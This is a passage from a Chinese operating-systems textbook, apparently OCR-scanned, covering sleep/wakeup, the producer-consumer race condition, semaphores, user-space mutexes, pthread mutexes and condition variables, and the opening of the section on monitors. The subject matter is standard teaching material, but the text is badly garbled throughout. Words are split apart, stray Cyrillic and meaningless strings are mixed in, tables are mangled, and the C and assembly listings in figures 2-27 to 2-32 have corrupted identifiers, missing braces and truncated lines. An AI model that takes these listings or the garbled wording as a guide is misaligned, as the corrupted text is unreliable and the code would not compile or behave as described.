L 不 会 被 调度 ， 也 就 无 法 离开 临界 区 ， 所 以 H 将 永远 忙 等 待 下 去 。 这 种 情况 有 时 被 称 作 优先 级 反 转 问题 
(priority inversion problem) 。 

现在 来 考察 几 条 进程 间 通 信 原 语 ， 它 们 在 无 法 进入 临界 区 时 将 阻塞 ， 而 不 是 忙 等 待 。 最 简单 的 是 
sleep 和 wakeup。sleep 是 一 个 将 引起 调用 进程 阻塞 的 系统 调用 ， 即 被 挂 起 ， 直 到 另外 一 个 进程 将 其 唤 
醒 。wakeup 调 用 有 一 个 参数 ， 即 要 被 唤醒 的 进程 。 另 一 种 方法 是 让 sleep 和 wakeup 各 有 一 个 参数 ， 即 
有 一 个 用 于 匹配 sleep 和 wakeup 的 内 存 地 址 。 

生产 者 一 消费 者 问题 

作为 使 用 这 些 原 语 的 一 个 例子 ， 我 们 考虑 生产 者 一 消费 者 (producer-consumer) 问题 ， 也 称 作 有 界 
Ж К (bounded-buffer) 问题 。 两 个 进程 共享 一 个 公共 的 固定 大 小 的 缓冲 区 。 其 中 一 个 是 生产 者 ， 将 
信息 放 人 缓冲 区 ， 另 一 个 是 消费 者 ， 从 缓冲 区 中 取出 信息 。( 也 可 以 把 这 个 问题 一 般 化 为 m 个 生产 者 和 nn 
个 消费 者 问题 ， 但 是 我 们 只 讨论 一 个 生产 者 和 一 个 消费 者 的 情况 ， 这 样 可 以 简化 解决 方案 。) 

问题 在 于 当 缓冲 区 已 满 ， 而 此 时 生产 者 还 想 向 其 中 放 入 一 个 新 的 数据 项 的 情况 。 其 解决 办 法 是 让 生 
产 者 睡眠 ， 待 消费 者 从 缓冲 区 中 取出 一 个 或 多 个 数据 项 时 再 唤醒 它 。 同 样 地 ， 当 消费 者 试图 从 缓冲 区 中 
取 数 据 而 发 现 缓冲 区 为 空 时 ， 消 费 者 就 睡眠 ， 直 到 生产 者 向 其 中 放 入 一 些 数据 时 再 将 其 唤醒 。 

这 个 方法 听 起 来 很 简单 ， 但 它 包含 与 前 边 假 脱 机 目录 问题 一 样 的 竞争 条 件 。 为 了 跟踪 缓冲 区 中 的 数 
据 项 数 ， 我 们 需要 一 个 变量 count。 如 果 缓 冲 区 最 多 存放 N 个 数据 项 ， 则 生产 者 代码 将 首先 检查 count 是 否 
达到 N， 若 是 ， 则 生产 者 睡眠 ， 否 则 生产 者 向 缓冲 区 中 放 入 一 个 数据 项 并 增 量 count 的 值 。 

消费 者 的 代码 与 此 类 似 : 首先 测试 count 是 否 为 0%， 若 是 ， 则 睡 眼 ， 否 则 从 中 取 走 一 个 数据 项 并 递减 count 
的 值 。 每 个 进程 同时 也 检测 另 一 个 进程 是 否 应 被 唤醒 ， 若 是 则 唤醒 之 。 生 产 者 和 消费 者 的 代码 如 图 2-27 所 示 。 


#define N 100 缓冲 区 中 的 村 数目 */ 
int count = 0; 六 缓冲 区 中 的 数据 项 数目 */ 
void producer(void) 
int item; 
while (TRUE) { /* 无限 循环 */ 
item = produce_item( ); 让 产生 下 一 新 数据 项 */ 
if (count == N) sleep( ); ЕБТ, ИЕЛЕ */ 
insert_item(item); H (9) 数据 项 放 入 缓冲 区 中 */ 
Count = count + 1; 六 将 缓冲 区 的 数据 项 计数 器 增 ! */ 
if (count == 1) wakeup(consumen); /* 缓冲 区 空 吗 ? */ 


} 

} 

void consumer(void) 
int йет; 


while (TRUE) { 人 无 限 循环 */ 


if (count == 0) sleep(); /* 如 果 缓 冲 区 空 ， 则 进入 休眠 状态 */ 
item = remove_item(); /从 缓冲 区 中 取出 一 个 数据 项 */ 
count = count – 1; /将 缓冲 区 的 数据 项 计数 器 减 1 */ 

И (count == М-1) Was ("рро */ 
consume_item(item) /* 打印 数据 项 */ 


图 2-27 含有 严重 竞争 条 件 的 生产 者 -消费 者 问题 
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为 了 在 C 语 言 中 表示 sleep 和 wakeup 这 样 的 系统 调用 ， 我 们 将 以 库 函 数 调用 的 形式 来 表示 。 尽 管 它 
们 不 是 标准 C 库 的 一 部 分 ， 但 在 实际 上 任何 系统 中 都 具有 这 些 库 函 数 。 未 列 出 的 过 程 insert-item 和 
remove_item 用 来 记录 将 数据 项 放 和 人 缓冲 区 和 从 缓冲 区 取出 数据 等 事项 。 

现在 回 到 竞争 条 件 的 问题 。 这 里 有 可 能 会 出 现 竞 争 条 件 ， 其 原因 是 对 count 的 访问 未 加 限制 。 有 可 
能 出 现 以 下 情况 : 缓冲 区 为 空 ， 消 费 者 刚刚 读 取 count 的 值 发 现 它 为 0。 此 时 调度 程序 决定 暂停 消费 者 并 
启动 运行 生产 者 。 生 产 者 向 缓冲 区 中 加 入 一 个 数据 项 ，count 加 1。 现 在 count 的 值 变 成 了 1。 它 推断 认为 
由 于 count 刚 才 为 0， 所 以 消费 者 此 时 一 定 在 睡眠 ， 于 是 生产 者 调用 wakeup 来 响 醒 消 费 者 。 

但 是 ， 消 费 者 此 时 在 逻辑 上 并 未 睡眠 ， 所 以 wakeup 信 号 丢失 。 当 消费 者 下 次 运行 时 ， 它 将 测试 先 
前 读 到 的 count 值 ， 发 现 它 为 0， 于 是 睡眠 。 生 产 者 迟早 会 填 满 整 个 缓冲 区 ， 然 后 睡眠 。 这 样 一 来 ， 两 个 
进程 都 将 永远 睡眠 下 去 。 

问题 的 实质 在 于 发 给 一 个 ( 尚 ) 未 睡眠 进程 的 wakeup 信 号 丢失 了 。 如 果 它 没有 丢失 ， 则 一 切 都 很 
正常 。 一 种 快速 的 弥补 方法 是 修改 规则 ， 加 上 一 个 唤醒 等 待 位 。 当 一 个 wakeup 信 号 发 送 给 一 个 清醒 的 进 
程 信号 时 ， 将 该 位 置 !。 随 后 ， 当 该 进程 要 睡眠 时 ， 如 果 唤 醒 等 待 位 为 !1， 则 将 该 位 清除 ， 而 该 进程 仍然 
保持 清醒 。 唤 醒 等 待 位 实际 上 就 是 wakeup 信 号 的 一 个 小 仓库 。 

尽管 在 这 个 简单 例子 中 用 唤醒 等 待 位 的 方法 解决 了 问题 ， 但 是 我 们 很 容易 就 可 以 构造 出 一 些 例子 ， 
其 中 有 三 个 或 更 多 的 进程 ， 这 时 一 个 唤醒 等 待 位 就 不 够 使 用 了 。 于 是 我 们 可 以 再 打 一 个 补丁 ， 加 入 第 二 
个 唤醒 等 待 位 ， 甚 至 是 8 个 、32 个 等 ， 但 原则 上 讲 ， 这 并 没有 从 根本 上 解决 问题 。 


2.3.5 信号 量 

信号 量 是 E. W. Dijkstra 在 1965 年 提出 的 一 种 方法 ， 它 使 用 一 个 整 型 变量 来 累计 唤醒 次 数 ， 供 以 后 使 
用 。 在 他 的 建议 中 引入 了 一 个 新 的 变量 类 型 ， 称 作 信号 量 (semaphore) 。 一 个 信号 量 的 取 值 可 以 为 0 
(表示 没有 保存 下 来 的 唤醒 操作 ) 或 者 为 正 值 (表示 有 一 个 或 多 个 唤醒 操作 )。 

Dijkstra 建 议 设立 两 种 操作 : down 和 up (分 别 为 一 般 化 后 的 sleep 和 wakeup) 。 对 一 信号 量 执行 
down 操 作 ， 则 是 检查 其 值 是 否 大 于 0。 若 该 值 大 于 0， 则 将 其 值 减 1 ( 即 用 掉 一 个 保存 的 唤醒 信号 ) 并 继 
续 ， 若 该 值 为 ?9， 则 进程 将 睡眠 ， 而 且 此 时 down 操 作 并 未 结束 。 检 查 数值 、 修 改变 量 值 以 及 可 能 发 生 的 
睡眠 操作 均 作为 一 个 单一 的 、 不 可 分 割 的 原子 操作 完成 。 保 证 一 旦 一 个 信号 量 操作 开始 ， 则 在 该 操作 完 
成 或 阻塞 之 前 ， 其 他 进程 均 不 允许 访问 该 信号 量 。 这 种 原子 性 对 于 解决 同步 问题 和 避免 竞争 条 件 是 绝对 
必要 的 。 所 谓 原 子 操作 ， 是 指 一 组 相关 联 的 操作 要 么 都 不 间断 地 执行 ， 要 么 都 不 执行 。 原 子 操作 在 计算 
机 科学 的 其 他 领域 也 是 非常 重要 的 。 

up 操作 对 信号 量 的 值 增 1。 如 果 一 个 或 多 个 进程 在 该 信号 量 上 睡眠 , 无 法 完成 一 个 先前 的 down 操 作 ， 
则 由 系统 选择 其 中 的 一 个 (如 随机 挑选 ) 并 允许 该 进程 完成 它 的 down 操 作 。 于 是 ， 对 一 个 有 进程 在 其 
上 睡眠 的 信号 量 执行 一 次 up 操作 之 后 ， 该 信号 量 的 值 仍 旧 是 0， 但 在 其 上 睡眠 的 进程 却 少 了 一 个 。 信 号 
量 的 值 增 1 和 唤醒 一 个 进程 同样 也 是 不 可 分 割 的 。 不 会 有 某 个 进程 因 执行 up 而 阻塞 ， 正 如 在 前 面 的 模型 
中 不 会 有 进程 因 执行 wakeup 而 阻塞 一 样 。 

顺便 提 一 下 ， 在 Dijkstra 原 来 的 论文 中 ， 他 分 别 使 用 名 称 P 和 V 而 不 是 down 和 up ， 荷 兰 语 中 ， 
Proberen 的 意思 是 党 试 ，Verhogen 的 含义 是 增加 或 升 高 。 由 于 对 于 不 讲 荷兰 语 的 读者 来 说 采用 什么 记号 
并 无 大 的 干系 ， 所 以 我 们 将 使 用 down 和 up 名 称 。 它 们 在 程序 设计 语言 Algol 68 中 首次 引入 。 

用 信号 量 解 决 生产 者 一 消费 者 问题 

用 信号 量 解决 丢失 的 wakeup 问 题 ， 如 图 2-28 所 示 。 为 确保 信号 量 能 正确 工作 ， 最 重要 的 是 要 采用 一 
种 不 可 分 割 的 方式 来 实现 它 。 通 常 是 将 up 和 down 作 为 系统 调用 实现 ， 而 且 操作 系统 只 需 在 执行 以 下 操 
作 时 暂时 屏蔽 全 部 中 断 ， 测试 信号 量 、 更 新 信号 量 以 及 在 需要 时 使 某 个 进程 睡眠 。 由 于 这 些 动作 只 需要 
几 条 指令 ， 所 以 屏 项 中 断 不 会 带 来 什么 副作用 。 如 果 使 用 多 个 CPU， 则 每 个 信号 量 应 由 一 个 锁 变量 进行 
保护 。 通 过 TSL 或 XCHG 指 令 来 确保 同一 时 刻 只 有 一 个 CPU 在 对 信号 量 进行 操作 。 

读者 必须 搞 清楚 ， 使 用 TSL 或 XCHG 指 令 来 防止 几 个 CPU 同时 访问 一 个 信号 量 ， 这 与 生产 者 或 消费 
者 使 用 忙 等 待 来 等 待 对 方 腾 出 或 填充 缓冲 区 是 完全 不 同 的 。 信 号 量 操作 仅 需 几 个 毫秒 ， 而 生产 者 或 消费 
者 则 可 能 需要 任意 长 的 时 间 。 
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该 解决 方案 使 用 了 三 个 信号 量 ， 一 个 称 为 full， 用 来 记录 充满 的 缓冲 档 数 目 ， 一 个 称 为 empty， 记 录 
空 的 缓冲 槽 总 数 ， 一 个 称 为 mutex， 用 来 确保 生产 者 和 消费 者 不 会 同时 访问 缓冲 区 。full 的 初 值 为 0， 
empty 的 初 值 为 缓冲 区 中 杜 的 数目 ，mutex 初 值 为 1。 供 两 个 或 多 个 进程 使 用 的 信号 量 ， 其 初 值 为 1 ， 保 证 
同时 只 有 一 个 进程 可 以 进入 临界 区 ， 称 作 二 元 信号 量 (binary semaphore)。 如 果 每 个 进程 在 进入 临界 区 
前 都 执行 一 个 down 操 作 ， 并 在 刚刚 退出 时 执行 一 个 up 操作 ， 就 能 够 实现 互 斥 。 

在 有 了 一 些 进程 间 通 信 原 语 之 后 ， 我 们 再 观察 一 下 图 2-5 中 的 中 断 顺 序 。 在 使 用 信号 量 的 系统 中 ， 
隐藏 中 断 的 最 自然 的 方法 是 为 每 一 个 1O 设 备 设置 一 个 信号 量 ， 其 初 值 为 0。 在 启动 一个 IO 设备 之 后 ， 管 
理 进程 就 立即 对 相关 联 的 信号 量 执行 一 个 down 操 作 ， 于 是 进程 立即 被 阻塞 。 当 中 断 到 来 时 ， 中 断 处 理 
程序 随后 对 相关 信号 量 执行 一 个 up 操作 ， 从 而 将 相关 的 进程 设置 为 就 绪 状 态 。 在 该 模型 中 ， 图 2-5 中 的 
第 5 步 包括 在 设备 的 信号 量 上 执行 up 操作 ， 这 样 在 第 6 步 中 ， 调 度 程序 将 能 执行 设备 管理 和 程序。 当然， 如 
果 这 时 有 几 个 进程 就 绪 ， 则 调度 程序 下 次 可 以 选择 一 个 更 为 重要 的 进程 来 运行 。 在 本 章 的 后 续 内 容 中 ， 
我 们 将 看 到 调度 算法 是 如 何 进行 的 。 

在 图 2-28 的 例子 中 ,我 们 实际 上 是 通过 两 种 不 同 的 方式 来 使 用 信号 量 , 两 者 之 间 的 区 别 是 很 重要 的 。 
信号 量 mutex 用 于 互 斥 ， 它 用 于 保证 任 一 时 刻 只 有 一 个 进程 读 写 缓冲 区 和 相关 的 变量 。 互 斥 是 避免 混乱 
所 必需 的 操作 。 在 下 一 节 中 ， 我 们 将 讨论 互 斥 量 及 其 实现 方法 。 


#define № 100 Вота */ 
typedef int semaphore; /* 信号 量 是 一 种 特殊 的 整 型 数据 */ 
semaphore mutex = 1; Ге 控制 对 临界 区 的 访问 */ 
semaphore empty = М; A 计数 缓冲 区 的 空 槽 数目 */ 
semaphore full = 0; /* 计数 缓冲 区 的 满 槽 数目 */ 
void producer(void) 
{ 
int йөт; 
while (TRUE) { /* TRUE 是 常量 1 */ 
item = produce_item( ); /产生 放 在 缓冲 区 中 的 一 些 数据 */ 
down(&empty); /* 将 空 槽 数目 减 1 */ 
down(&mutex); * 进入 临界 区 */ 
їпзеп _йет(йет); 少将 新 数据 项 放 到 缓冲 区 中 */ 
up(&mutex); /* 离开 临界 区 */ 
up(&full); Ae 将 满 槽 的 数目 加 1 */ 
1 
} 
void consumer(void) 
{ 
int йет; 
while (TRUE) { 1 无 限 循环 */ 
down(&full); 人 = 将 满 覃 数目 减 1 */ 
down(&mutex); 位 进入 临界 区 */ 
item = remove_item(); /* 从 缓冲 区 中 取出 数据 项 */ 
ир(&тиіех); A 离开 临界 区 */ 
up(&empty); AZAKA +7 
сопзите _йет(йет); ї* 处 理 数据 项 */ 
) 
) 


图 2-28 使 用 信号 量 的 生产 者 -消费 者 问题 


信号 量 的 另 一 种 用 途 是 用 于 实现 同步 (synchronization) 。 信号 量 full 和 empty 用 来 保证 某 种 事件 的 顺 
序 发 生 或 不 发 生 。 在 本 例 中 ， 它 们 保证 当 缓冲 区 满 的 时 候 生产 者 停止 运行 ， 以 及 当 缓 冲 区 空 的 时 候 消费 
者 停止 运行 。 这 种 用 法 与 互 斥 是 不 同 的 。 
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23.6 HRE 

如 果 不 需要 信号 量 的 计数 能 力 ， 有 时 可 以 使 用 信号 量 的 一 个 简化 版 本 ， 称 为 互 斤 量 (mutex)。 互 斥 
量 仅 仅 适 用 于 管理 共享 资源 或 一 小 段 代 码 。 由 于 互 斥 量 在 实现 时 既 容 易 又 有 效 ， 这 使 得 互 斥 量 在 实现 用 
户 空间 线程 包 时 非常 有 用 。 

互 斥 量 是 一 个 可 以 处 于 两 态 之 一 的 变量 : 解锁 和 加 锁 。 这 样 ， 只 需要 一 个 二 进 制 位 表示 它 ， 不 过 实 
际 上 ， 常 常 使 用 一 个 整 型 量 ，0 表 示 解 锁 ， 而 其 他 所 有 的 值 则 表示 加 锁 。 互 斥 量 使 用 两 个 过 程 。 当 一 个 
线程 (或 进程 ) 需要 访问 临界 区 时 ， 它 调用 mutex_lock。 如 果 该 互 斥 量 当 前 是 解锁 的 〈 即 临界 区 可 用 )， 
此 调用 成 功 ， 调 用 线程 可 以 自由 进入 该 临界 区 。 

另 一 方面 ， 如 果 该 互 斥 量 已 经 加 锁 ， 调 用 线程 被 阻塞 ， 直 到 在 临界 区 中 的 线程 完成 并 调用 
mutex_unlock。 如 果 多 个 线程 被 阻塞 在 该 互 扩 量 上 ， 将 随机 选择 一 个 线程 并 允许 它 获得 锁 。 

由 于 互 斥 量 非常 简单 ， 所 以 如 果 有 可 用 的 TSL 或 XCHG 指 令 ， 就 可 以 很 容易 地 在 用 户 空间 中 实现 它 
们 。 用 于 用 户 级 线程 包 的 mutex_lock 和 mutex_unlock 代 码 如 图 2-29 所 示 。XCHG 解 法 本 质 上 是 相同 的 。 


mutex_lock: 
TSL REGISTER,MUTEX патарината. 并 且 将 互 斥 信号 量 置 为 1 
СМР REGISTER,#0 IERES 
JZE ok КАЧ УЛ н, 所 以 返回 
CALL thread_yield тала, 调度 另 
JMP тиѓех Іоск 1 稍 后 再 ; 
ок: ВЕТ ЖЕНИ, 进入 临界 区 
mutex_unlock: 
MOVE MUTEX,#0 1 #тшех@ 50 
ВЕТ 1 返回 调用 者 


图 2-29 mutex_lock 和 mutex_unlock 的 实现 


mutex_lock 的 代码 与 图 2-25 中 enter_region 的 代码 很 相似 ， 但 有 一 个 关键 的 区 别 。 当 enter_region 进 
入 临界 区 失败 时 ， 它 始终 重复 测试 镇 ( 忙 等 待 )。 实 际 上 ， 由 于 时 钟 超时 的 作用 ， 会 调度 其 他 进程 运行 。 
这 样 迟早 拥有 锁 的 进程 会 进入 运行 并 释放 锁 。 

在 (用户) 线程 中 ， 情 形 有 所 不 同 ， 因 为 没有 时 钟 停止 运行 时 间 过 长 的 线程 。 结 果 是 通过 忙 等 待 的 
方式 来 试图 获得 锁 的 线程 将 永远 循环 下 去 ， 决 不 会 得 到 锁 ， 因 为 这 个 运行 的 线程 不 会 让 其 他 线程 运行 从 
而 释放 锁 。 

以 上 就 是 enter_region 和 mutex_lock 的 差别 所 在 。 在 后 者 取 锁 失败 时 ， 它 调用 thread_yield 将 CPU 放 
弃 给 另 一 个 线程 。 这 样 ， 就 没有 忙 等 待 。 在 该 线程 下 次 运行 时 ， 它 再 一 次 对 锁 进 行 测试 。 

由 于 thread_yield 只 是 在 用 户 空间 中 对 线程 调度 程序 的 一 个 调用 ， 所 以 它 的 运行 非常 快捷 。 这 样 ， 
mutex-lock 和 mutex_unlock 都 不 需要 任何 内 核 调 用 。 道 过 使 用 这 些 过 程 ， 用 户 线程 完全 可 以 实现 在 用 户 
空间 中 的 同步 ， 这 些 过 程 仅仅 需要 少量 的 指令 。 

上 面 所 叙述 的 互 斥 量 系统 是 一 套 调用 框架 。 对 于 软件 来 说 ， 总 是 需要 更 多 的 特性 ， 而 同步 原 语 也 不 
例外 。 例 如 ， 有 时 线程 包 提供 一 个 调用 mutex_trylock， 这 个 调用 或 者 获得 锁 或 者 返回 失败 码 ， 但 并 不 阻 
塞 线程 。 这 就 给 了 调用 线程 一 个 灵活 性 ， 用 以 决定 下 一 步 做 什么 ， 是 使 用 替代 办 法 还 只 是 等 待 下 去 。 

到 目前 为 止 ， 我 们 掩盖 了 一 个 问题 ， 不 过 现在 还 是 有 必要 把 这 个 问题 提出 来 。 在 用 户 级 线程 包 中 ， 
多 个 线程 访问 同一 个 互 斥 量 是 没有 问题 的 ， 因 为 所 有 的 线程 都 在 一 个 公共 地 址 空间 中 操作 。 但 是 ， 对 于 
大 多 数 早期 解决 方案 ， 诸 如 Peterson 算 法 和 信号 量 等 ， 都 有 一 个 未 说 明 的 前 提 ， 即 这 些 多 个 进程 至 少 应 
该 访问 一 些 共享 内 存 ， 也 许 仅仅 是 一 个 字 。 如 果 进 程 有 不 连续 的 地 址 空间 ， 如 我 们 始终 提 到 的 ， 那 么 在 
Peterson 算 法 、 信 号 量 或 公共 缓冲 区 中 ， 它 们 如 何 共享 um 变量 呢 ? 

有 两 种 方案 。 第 一 种 ， 有 些 共享 数据 结构 ， 如 信号 量 ， 可 以 存放 在 内 核 中 ， 并 且 只 能 通过 系统 调用 
来 访问 。 这 种 处 理 方式 化 解 了 上 述 问题 。 第 二 种 ， 多 数 现代 操作 系统 (包括 UNIX 和 Windows) 提供 一 
种 方法 ， 让 进程 与 其 他 进程 共享 其 部 分 地 址 空间 。 在 这 种 方法 中 ， 缓 冲 区 和 其 他 数据 结构 可 以 共享 。 在 
最 坏 的 情形 下 ， 如 果 没有 可 共享 的 途径 ， 则 可 以 使 用 共享 文件 。 
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如 果 两 个 或 多 个 进程 共享 其 全 部 或 大 部 分 地 址 空间 ， 进 程 和 线程 之 间 的 差别 就 变 得 模糊 起 来 ， 但 无 
论 怎样 ， 两 者 的 差别 还 是 有 的 。 共 享 一 个 公共 地 址 空间 的 两 个 进程 仍旧 有 各 自 的 打开 文件 、 报 警 定 时 器 以 
及 其 他 一 些 单个 进程 的 特性 ， 而 在 单个 进程 中 的 线程 ， 则 共享 进程 全 部 的 特性 。 另 外 ， 共 享 一 个 公共 地 址 
空间 的 多 个 进程 决 不 会 拥有 用 户 级 线程 的 效率 ， 这 一 点 是 不 容 置疑 的 ， 因 为 内 核 还 同 其 管理 密切 相关 。 

Pthread 中 的 互 斥 

Pthread 提 供 许多 可 以 用 来 同步 线程 的 函数 。 其 基本 机 制 是 使 用 一 个 可 以 被 锁定 和 解锁 的 互 斥 量 来 
保护 每 个 临界 区 。 一 个 线程 如 果 想 要 进入 临界 区 ， 它 首先 尝试 锁 住 相关 的 互 扩 量 。 如 果 互 斥 量 没有 加 锁 ， 
那么 这 个 线程 可 以 立即 进入 ， 并 且 该 互 斥 量 被 自动 锁定 以 防止 其 他 线程 进入 。 如 果 互 斥 量 已 经 被 加 锁 ， 
则 调用 线程 被 阻塞 ， 直 到 该 互 斥 量 被 解锁 。 如 果 多 个 线程 在 等 待 同一 个 互 斥 量 ， 当 它 被 解锁 时 ， 这 些 等 
待 的 线程 中 只 有 一 个 被 允许 运行 并 将 互 斥 量 重新 锁定 。 这 些 互 斥 锁 不 是 强制 性 的 ， 而 是 由 程序 员 来 保证 
线程 正确 地 使 用 它们 。 

与 互 斥 量 相关 的 主要 函数 调用 如 图 2-30 所 示 。 就 像 所 期 待 的 那样 ， 可 以 创建 和 撤销 互 斥 量 。 实 现 它 
们 的 函数 调用 分 别 是 pthread_mutex_init 与 pthread_mutex_destroy。 也 可 以 通过 pthread_mutex_lock 给 互 斥 
量 加 锁 ， 如 果 该 互 斥 量 已 被 加 锁 时 ， 则 会 阻塞 调 


用 者 。 还 有 一 个 调用 可 以 用 来 尝试 镇 住 一 个 互 斥 线程 调用 йж 
量 ， 当 互 斥 量 已 被 加 锁 时 会 返回 错误 代码 而 不 是 {| _pthread_matex_init | оета 
阻塞 调用 者 。 这 个 调用 就 是 pthread_mutex_trylock。 Pthread_mutex_destroy | 撤销 一 个 已 存在 的 互 斥 量 


如 果 需 要 的 话 ， 访 调用 允许 一 个 线程 有 效 地 忙 等 Pthread_mutex_lock _ | 获得 一 个 锁 或 阻塞 
待 。 最 后 ，pthread_mutex_unlock 用 来 给 一 个 互 斥 Pthread_mutex_trylock | 获得 一 个 锁 或 失败 
基 解 锁 ， 并 在 一 个 或 多 个 线程 等 待 它 的 情况 下 正 Веза тше оток | й чй 

确 地 释放 一 个 线程 。 互 斥 量 也 可 以 有 属性 ， 但 是 图 2-30 一 些 与 互 斥 量 相关 的 pthread 调 用 
这 些 属性 只 在 某 些 特殊 的 场合 下 使 用 。 

除 互 斥 量 之 外 ，pthread 提 供 了 另 一 种 同步 机 制 ， 条 件 变量 。 互 斥 量 在 允许 或 阻 密 对 临界 区 的 访问 上 
是 很 有 用 的 ， 条 件 变量 则 允许 线程 由 于 一 些 未 达到 的 条 件 而 阻塞 。 绝 大 部 分 情况 下 这 两 种 方法 是 一 起 使 
用 的 。 现 在 让 我 们 进一步 地 研究 线程 、 互 斥 量 、 条 件 变量 之 间 的 关联 。 

举 一 个 简单 的 例子 ， 再 次 考虑 一 下 生产 者 -消费 者 问题 ， 一 个 线程 将 产品 放 在 一 个 缓冲 区 内 ， 由 另 
一 个 线程 将 它们 取出 。 如 果 生 产 者 发 现 缓冲 区 中 没有 空 槽 可 以 使 用 了 ， 它 不 得 不 阻塞 起 来 直到 有 -个 空 
档 可 以 使 用 。 生 产 者 使 用 互 斥 量 可 以 进行 原子 性 检查 ， 而 不 受 其 他 线程 干扰 。 但 是 当 发 现 缓冲 区 已 经 满 
了 以 后 ， 生 产 者 需要 一 种 方法 来 阻塞 自己 并 在 以 后 被 唤醒 。 这 便 是 条 件 变量 做 的 事 了 。 

与 条 件 变量 相关 的 pthread 调 用 如 图 2-31 所 示 。 就 像 你 可 能 期 待 的 那样 ， 这 里 有 专门 的 调用 用 来 创建 
和 撤销 条 件 变量 。 它 们 可 以 有 属性 ， 并 且 有 不 同 的 调用 来 管理 它们 (图 中 没有 显示 )。 与 条 件 变量 相关 
的 最 重要 的 两 个 操作 是 pthread_cond_wait 和 


pthread_cond_signal。 前 者 阻塞 调用 线程 直到 另 suan E ж 

一 其 他 线程 向 它 发 信号 (使 用 后 一 个 调用 )。 当然 ， [реа сопа init СЕЗ 
阻塞 与 等 待 的 原因 不 是 等 待 与 发 信号 协议 的 一 部 |Pihread-_cond_destroy 搬 销 一 个 条 件 变量 
э. втжнавеждатня атат том мап БАЕ РӘ 
做 基 些 工作 、 释 放 革 些 资源 或 是 进行 其 他 的 一 些 |бос==шыш | постанян» 
їй}, ЛАГАТА НА В ГДЕ ан. Гаа ана Бона S A ТРЕ 
条 件 变量 允许 这 种 等 待 与 阻塞 原子 性 地 进行 。 当 让 它们 全 部 只 本 

有 多 个 线程 被 阻 窗 并 等 待 同一 个 信号 时 ， 可 以 全 

用 pthread_cond_broadcast 调 用 。 图 2-31 一 些 与 条 件 变 量 相关 的 pthread 调 用 


条 件 变量 与 互 斥 量 经 常 一 起 使 用 。 这 种 模式 
用 于 让 一 个 线程 锁 住 一 个 互 斥 量 ， 然 后 当 它 不 能 获得 它 期 待 的 结果 时 等 待 一 个 条 件 变量 。 最 后 另 一 个 线 
程 会 向 它 发 信号 ， 使 它 可 以 继续 执行 。pthread_cond_wait 原 子 性 地 调用 并 解锁 它 持 有 的 互 斥 量 。 由 于 这 
个 原因 ， 互 斥 若 是 参数 之 一 。 

值得 指出 的 是 ， 条 件 变量 〈 不 像 信 号 量 ) 不 会 存在 内 存 中 。 如 果 将 - -个 信号 量 传递 给 一 个 没有 线程 
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在 等 待 的 条 件 变 量 ， 那 么 这 个 信号 就 会 丢失 。 程 序 员 必须 小 心 使 用 避免 丢失 信和 号。 

作为 如 何 使 用 一 个 互 斥 量 与 条 件 变 量 的 例子 ， 图 2-32 展 示 了 一 个 非常 简单 只 有 一 个 缓冲 区 的 生产 
者 -消费 者 问题 。 当 生产 者 填 满 缓冲 区 时 ， 它 在 生产 下 一 个 数据 项 之 前 必须 等 待 ， 直 到 消费 者 清空 了 它 。 
类 似 地 ， 当 消费 者 移 走 一 个 数据 项 时 ， 它 必须 等 待 ， 直 到 生产 者 生产 了 另外 一 个 数据 项 。 尽 管 很 简单 ， 
这 个 例子 却说 明了 基本 的 机 制 。 使 一 个 线程 睡眠 的 语句 应 该 总 是 要 检查 这 个 条 件 ， 以 保证 线程 在 继续 执 
行 前 满足 条 件 ， 因 为 线程 可 能 已 经 因为 一 个 UNIX 信 号 或 其 他 原因 而 被 唤醒 。 


#include <stdio.h> 


#include <pthread.h> 

#define MAX 1000000000 
pthread_mutex_t the_mutex; 
pthread_cond.t condc, condp; 


六 需要 生产 的 数量 "/ 


int buffer = 0; 性 生产 者 消费 者 使 用 的 缓冲 区 */ 
void “producer(void *ptr) 六 生产 数据 */ 
(inti 

tor (i= 1; i <= MAX; i++) { 


pthread_mutex_lock(&the_mutex); /* 互 斥 使 用 缓冲 区 */ 
while (buffer != 0) pthread_cond шерте &the_mutex); 


bufter = i; 7 
pthread сопа _ѕідпа(ёсопас); ТР = 
Pthread_ Mmutex люската mutex). 让 释放 缓冲 区 */ 


} 
pthread_exit(0); 
} 
void "consumertvoid “ptr) 六 消费 数据 "/ 
C inti 
tor (i = 1; i <= MAX; i++) { 
pthread_mutex_lock(&the_mutex); /* 77 ч 
while (buffer ==0 ) рћгеаа -cond-wait(&: леа ы; 
buffer = 0; "Мар. 中 取出 数据 ч 
pthread- cond_signal(&condp); 个 唤醒 生产 者 */ 
pthread_mutex_unlock(&the_mutex);，/* 释放 缓冲 区 */ 


} 
pthread- exit(0); 
} 


int main(int argc, char **argv) 
4 


pthread_t pro, con; 
pthread_mutex_init(&the mutex, 0); 
pthread_cond_init(&condc, 0); 
pthread_cond_init(&condp, 0); 
pthread- create{&con, 0, consumer, 0); 


pthread cond _destroy(&condp) 
pthread_mutex_destroy(&the _， н 


图 2-32 利用 线程 解决 生产 者 一 消费 者 问题 


237 管 程 

有 了 信号 量 和 互 斥 量 之 后 ， 进 程 间 通信 看 来 就 很 容易 了 ， 实 际 是 这 样 的 吗 ? 答案 是 否定 的 。 请 仔细 
考察 图 2-28 中 向 缓冲 区 放 入 数据 项 以 及 从 中 删除 数据 项 之 前 的 down 操 作 。 假 设 将 生产 者 代码 中 的 两 个 
down 操 作 交换 一 下 次 序 ， 将 使 得 mutex 的 值 在 empty 之 前 而 不 是 在 其 之 后 被 减 1。 如 果 缓 冲 区 完全 满 了 ， 
生产 者 将 阻塞 ，mutex 值 为 0。 这 样 一 来 ， 当 消费 者 下 次 试图 访问 缓冲 区 时 ， 它 将 对 mutex 执 行 一 个 down 
操作 ， 由 于 mutex 值 为 0%， 则 消费 者 也 将 阻塞 。 两 个 进程 都 将 永远 地 阻塞 下 去 ， 无 法 再 进行 有 效 的 工作 ， 
这 种 不 幸 的 状况 称 作 死 锁 (dead lock)。 我 们 将 在 第 6 章 中 详细 讨论 死 锁 问 题 。 
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指出 这 个 问题 是 为 了 说 明 使 用 信号 量 时 要 非常 小 心 。 


一 处 很 小 的 错误 将 导致 很 大 的 麻烦 。 这 就 像 用 


汇编 语言 编程 一 样 ， 甚 至 更 精 ， 因 为 这 里 出 现 的 错误 都 是 竞争 条 件 、 死 锁 以 及 其 他 一 些 不 可 预测 和 不 可 


再 现 的 行为 。 

为 了 更 易于 编写 正确 的 程序 ，Brinch Hansen 
(1973) 和 Hoare (1974) 提出 了 一 种 高 级 同步 原 语 ， 称 
HEAL 《monitor)。 在 下 面 的 介绍 中 我 们 会 发 现 ， 他 们 
